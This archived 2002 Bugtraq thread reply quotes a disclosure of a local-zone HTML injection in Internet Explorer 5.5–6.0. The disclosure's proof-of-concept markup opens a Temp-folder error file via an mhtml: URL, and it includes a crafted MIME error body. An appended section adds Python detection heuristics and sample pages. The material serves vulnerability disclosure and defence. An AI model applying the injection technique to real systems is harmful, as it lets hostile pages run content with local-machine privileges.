RE: SILLY BEHAVIOR : Internet Explorer 5.5 - 6.0

From: Robert Sullivan (rsullivan@art-line.com)
Date: Thu Aug 15 2002 - 12:04:51 PDT


    It works on windows 2000 SP3 with IE6 with all the patches.  At least
    for me.
    
    -- 
    Bob Sullivan
    Art Line Inc.
    rsullivan@art-line.com
    
    -----Original Message-----
    From: http-equivat_private [mailto:http-equivat_private] 
    Sent: Wednesday, August 14, 2002 7:34 PM
    To: bugtraqat_private; NTBugtraqat_private
    Cc: focus-msat_private; vuln-devat_private
    Subject: SILLY BEHAVIOR : Internet Explorer 5.5 - 6.0
    
    Wednesday, August 14, 2002
    
    The following represents a trivial yet elaborate method of injecting 
    arbitrary html into the "My Computer" zone on win98 using the 
    Internet Explorer series of browsers.
    
    Internet Explorer enjoys a unique component called the "Web Folder" 
    component. This is a selectable component install with the original 
    installation of the browser or can be added later on. This unique 
    component allows for an assortment of web publishing and authoring 
    conveniences, often touted as useful "feature".
    
    But what it actually does, is create a nicely named file for us in a 
    known location.
    
    Where:
    
    The Internet Explorer series 5 through 6 enjoy a related behavior to 
    the so-called "Web Folder" component which allows us to point 
    directly to one of these web folders and traverse it directly. 
    However, should the folder not exist, an error message is generated 
    and conveniently placed for us in the temp folder:
    
    So:
    
    This particular error message is nothing more than a server side 404 
    error message which can be modified to suit our needs as we require.
    
    Commence:
    
    We first construct our trivial behavior to generate the error message 
    like so:
    
    <body onload=malware() style="behavior: url(#default#httpFolder);">
    <script>
    function malware(){
    document.body.navigate("http://www.microsoft.com");alert("malware");
    open("file://C%3A%5CWINDOWS%5CTemp%5Cwecerr.txt")
    }
    </script>
    
    What this will do is "probe" the target site for a webfolder, and if 
    not found, create our error file in the temp folder as follows:
    
    [screen shot: http://www.malware.com/behave.png 4KB]
    
    Because the error file is nothing more than a text file, we need to 
    include our own html and allow Internet Explorer to 'read' it. 
    Previously numerous possibilities to allow for this existed, 
    including <object data="" type="text/html">, databinding with 
    dataformatas="HTML", dotting file extensions etc.  These now all 
    appear to be patched.
    
    Good:
    
    But because we can craft our own error message on the server and 
    point our trivial behavior to it, we simply construct our error 
    message like so:
    
    MIME-Version: 1.0
    Content-Type: text/html;
     charset="Windows-1252"
    Content-Transfer-Encoding: 7bit
    
    <br><br>
    <body bgcolor=black>
    <center><font size="24" color="red" 
    face="arial">malware</font></center>
    
    What that will do is generate our simple text file in our temp 
    folder, and by merely mhtml'izing our url like so: 
    open("mhtml:file://C%3A%5CWINDOWS%5CTemp%5Cwecerr.txt"), Internet 
    Explorer will open our text file in full html splendor. 
    
    Inclusive of whatever other "objects" we so desire. 
    
    [screen shot: http://www.malware.com/your.png 8KB]
    
    Working Example:
    
    note: windows98 with temp folder default.
    note: requires the 'web component'
    note: simple text file only for demo purposes
    
    http://www.malware.com/behave.html
    
    
    [screen shot: http://www.malware.com/self.png 12KB]
    
    
    Notes: 
    
    1. None.
    
    
    
    End Call
    
    
    -- 
    http://www.malware.com
    
    
    
    
    
    
    *yawn*
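
The two ingredients the original message describes (a page that attaches the httpFolder behavior and then opens a predictable file in the user's Temp folder via an mhtml: URL, and a "404 error" body that carries MIME headers declaring text/html) are the observables a defender can look for in proxied web content and in cached files. The following is an added example written for this archive page, not code from either message in the thread; the sample pages, the error-file body, the path heuristics and every function name in it are constructed for illustration, and the verdict logic is a simple triage heuristic rather than a vendor signature.

```python
"""Triage checks for the IE "Web Folder" / mhtml local-file pattern."""
import re
from email.parser import Parser
from urllib.parse import unquote

# Constructed sample page that carries the indicators discussed in the thread
# (hypothetical markup, not the live example from the original message).
SUSPECT_PAGE = """<body onload=go() style="behavior: url(#default#httpFolder);">
<script>
function go(){
document.body.navigate("http://example.test");
open("mhtml:file://C%3A%5CWINDOWS%5CTemp%5Cwecerr.txt")
}
</script>"""

# Constructed benign page: an onload handler and a UNC-style file link,
# but no httpFolder behavior and no mhtml: scheme.
BENIGN_PAGE = """<body onload="init()">
<script>function init(){ document.title = "hello"; }</script>
<a href="file://server/share/readme.txt">readme</a>"""

# Constructed copy of an "error file" shaped like the one in the thread:
# MIME headers first, then markup that only renders if the type is honoured.
SUSPECT_ERROR_FILE = """MIME-Version: 1.0
Content-Type: text/html;
 charset="Windows-1252"
Content-Transfer-Encoding: 7bit

<body bgcolor=black><center>demo</center></body>
"""

# Individual indicators; none is conclusive on its own.
INDICATORS = {
    "httpfolder_behavior": re.compile(
        r"behavior\s*:\s*url\(\s*#default#httpFolder\s*\)", re.I),
    "navigate_call": re.compile(r"\.navigate\s*\(", re.I),
    "mhtml_scheme": re.compile(r"\bmhtml:", re.I),
}
# file:// URLs, optionally wrapped in mhtml:, up to the closing quote/bracket.
FILE_URL = re.compile(r"(?:mhtml:)?file://([^\"'\s>)]+)", re.I)
# Drive-letter path into a Temp directory, e.g. C:\WINDOWS\Temp\... (heuristic).
LOCAL_TEMP = re.compile(r"^[a-z]:\\.*\\temp\\", re.I)


def local_file_targets(html):
    """Return the percent-decoded targets of every file:// URL in the page."""
    return [unquote(m.group(1)) for m in FILE_URL.finditer(html)]


def scan_page(html):
    """Score a page: behavior attached AND a local mhtml/Temp target -> suspicious."""
    hits = {name: bool(rx.search(html)) for name, rx in INDICATORS.items()}
    paths = local_file_targets(html)
    temp_paths = [p for p in paths if LOCAL_TEMP.match(p)]
    suspicious = hits["httpfolder_behavior"] and (hits["mhtml_scheme"] or bool(temp_paths))
    return {
        "indicators": hits,
        "file_paths": paths,
        "temp_paths": temp_paths,
        "suspicious": suspicious,
    }


def classify_error_file(text):
    """Parse the MIME header block of a cached 'error' file.

    A file that is supposed to be a plain-text error message but declares
    Content-Type: text/html and contains markup is the shape described above.
    """
    msg = Parser().parsestr(text)
    ctype = msg.get_content_type()  # defaults to text/plain when no header exists
    body = msg.get_payload()
    return {
        "content_type": ctype,
        "has_markup": bool(re.search(r"<\w+", body)),
        "renders_as_html": ctype == "text/html",
    }


if __name__ == "__main__":
    print(scan_page(SUSPECT_PAGE))
    print(scan_page(BENIGN_PAGE))
    print(classify_error_file(SUSPECT_ERROR_FILE))
```

The page scan deliberately requires the behavior attachment together with a local target, because a bare file:// link to a network share (as in the benign sample) is routine on intranets; the error-file check is the complement on the host side, where a "text" file in Temp that announces itself as text/html and carries markup is worth a closer look.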
    



    This archive was generated by hypermail 2b30 : Thu Aug 15 2002 - 15:13:42 PDT